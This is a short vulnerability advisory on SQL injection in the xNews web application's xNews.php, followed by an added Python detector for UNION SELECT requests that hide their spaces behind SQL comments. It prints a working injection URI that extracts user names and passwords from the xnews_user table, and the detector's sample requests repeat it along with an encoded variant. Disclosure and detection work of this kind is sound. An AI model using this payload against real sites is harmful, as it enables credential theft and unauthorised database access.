X-DEV xNews xNews.php SQL Injection Vulnerability

Attackers can exploit this issue via a web client.

The following URI is sufficient to trigger this issue:

http://www.example.com/xNews.php?act=shownews&id=-1/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/xnews_user/**/where/**/id%20like%201/*
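
Detection logic for requests of this shape, added here as an example and not part of the original advisory: it percent-decodes the `id` parameter, replaces SQL comments with spaces so that `/**/` cannot stand in for whitespace, and only then applies a whitespace-based UNION SELECT signature. The request lines are constructed, and the rule that a legitimate `id` is a plain integer is an assumption about the application.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed request lines for illustration (not real traffic).
SAMPLE_REQUESTS = [
    "GET /xNews.php?act=shownews&id=12 HTTP/1.1",
    "GET /xNews.php?act=shownews&id=-1/**/union/**/select/**/0,1,"
    "concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/xnews_user"
    "/**/where/**/id%20like%201/* HTTP/1.1",
    "GET /xNews.php?act=shownews&id=7%2F%2A%2A%2FUnIoN%2F%2A%2A%2FSeLeCt%2F%2A%2A%2F1 HTTP/1.1",
    "GET /xNews.php?act=shownews&id=12abc HTTP/1.1",
    "GET /index.php?id=abc HTTP/1.1",
]

# A closed /* ... */ comment, or an unterminated /* running to the end of the value.
SQL_COMMENT = re.compile(r"/\*.*?\*/|/\*.*\Z", re.S)
# Whitespace-based signature; it only fires once comments are turned into spaces.
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)

def normalize(value):
    """Turn SQL comments into single spaces so /**/ cannot stand in for whitespace."""
    return re.sub(r"\s+", " ", SQL_COMMENT.sub(" ", value)).strip()

def classify(request_line):
    """Return 'ok', 'non-numeric-id' or 'union-select' for one request line."""
    parts = request_line.split(" ")
    if len(parts) != 3:
        return "ok"  # not a well-formed request line; out of scope here
    url = urlsplit(parts[1])
    if not url.path.lower().endswith("/xnews.php"):
        return "ok"
    verdict = "ok"
    # parse_qs percent-decodes, so %2F%2A%2A%2F is seen as /**/.
    for value in parse_qs(url.query).get("id", []):
        if re.fullmatch(r"[0-9]+", value):  # assumption: id is a plain integer
            continue
        if UNION_SELECT.search(normalize(value)):
            return "union-select"
        verdict = "non-numeric-id"
    return verdict

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(f"{classify(line):15} {line[:70]}")
```

Without the `normalize` step the signature does not match the comment-separated form, which is why the comments are replaced before matching.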


 

Copyright 2010, SecurityFocus